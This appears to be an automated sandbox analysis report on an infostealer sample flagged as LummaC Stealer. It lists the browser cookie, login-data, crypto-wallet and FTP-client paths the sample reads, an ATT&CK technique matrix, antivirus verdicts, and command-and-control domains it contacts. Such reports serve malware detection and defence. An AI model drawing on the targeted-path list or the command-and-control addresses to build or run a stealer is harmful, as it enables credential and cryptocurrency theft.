              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2310705621.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: k7T6akLcAr.exe PID: 6032, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: k7T6akLcAr.exe PID: 6032, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		44
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              Query Registry              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory851
              Security Software Discovery              		Remote Desktop Protocol41
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager44
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials223
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              k7T6akLcAr.exe55%ReversingLabsWin32.Infostealer.Tinba
              k7T6akLcAr.exe57%VirustotalBrowse
              k7T6akLcAr.exe100%AviraTR/Crypt.TPM.Gen
              k7T6akLcAr.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://lev-tolstoi.com:443/apingNot_NullproductState100%Avira URL Cloudmalware
              https://lev-tolstoi.com/apiFV100%Avira URL Cloudmalware
              https://lev-tolstoi.com/pi;100%Avira URL Cloudmalware
              https://lev-tolstoi.com/$$100%Avira URL Cloudmalware
              https://lev-tolstoi.com/api?100%Avira URL Cloudmalware
              https://lev-tolstoi.com/api9100%Avira URL Cloudmalware
              https://lev-tolstoi.com/api3100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              		23.55.153.106
              		truefalse
                		high
                lev-tolstoi.com
                		172.67.157.254
                		truefalse
                  		high
                  cashfuzysao.buzz
                  		unknown
                  		unknownfalse
                    		high
                    scentniej.buzz
                    		unknown
                    		unknownfalse
                      		high
                      inherineau.buzz
                      		unknown
                      		unknownfalse
                        		high
                        prisonyfork.buzz
                        		unknown
                        		unknownfalse
                          		high
                          rebuildeso.buzz
                          		unknown
                          		unknownfalse
                            		high
                            appliacnesot.buzz
                            		unknown
                            		unknownfalse
                              		high
                              hummskitnj.buzz
                              		unknown
                              		unknownfalse
                                		high
                                mindhandru.buzz
                                		unknown
                                		unknownfalse
                                  		high
                                  screwamusresz.buzz
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    scentniej.buzzfalse
                                      		high
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        		high
                                        rebuildeso.buzzfalse
                                          		high
                                          appliacnesot.buzzfalse
                                            		high
                                            screwamusresz.buzzfalse
                                              		high
                                              cashfuzysao.buzzfalse
                                                		high
                                                inherineau.buzzfalse
                                                  		high
                                                  https://lev-tolstoi.com/apifalse
                                                    		high
                                                    hummskitnj.buzzfalse
                                                      		high
                                                      mindhandru.buzzfalse
                                                        		high
                                                        prisonyfork.buzzfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtabk7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://steamcommunity.com/?subsection=broadcastsk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://store.steampowered.com/subscriber_agreement/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.valvesoftware.com/legal.htmk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRik7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://lev-tolstoi.com/pi;k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://lev-tolstoi.com/k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2283837927.0000000005596000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2284043332.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2261475852.000000000558A000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2260828830.0000000005585000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://store.steampowered.com/privacy_agreement/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYik7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://store.steampowered.com/points/shop/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://ocsp.rootca1.amazontrust.com0:k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&ak7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.ecosia.org/newtab/k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brk7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://store.steampowered.com/privacy_agreement/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://lev-tolstoi.com:443/apingNot_NullproductStatek7T6akLcAr.exe, 00000000.00000003.2354242281.0000000000AAB000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        		unknown
                                                                                                                        https://lev-tolstoi.com/apiFVk7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A4D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        		unknown
                                                                                                                        https://lev-tolstoi.com/$$k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        		unknown
                                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctak7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://store.steampowered.com/about/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://steamcommunity.com/my/wishlist/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
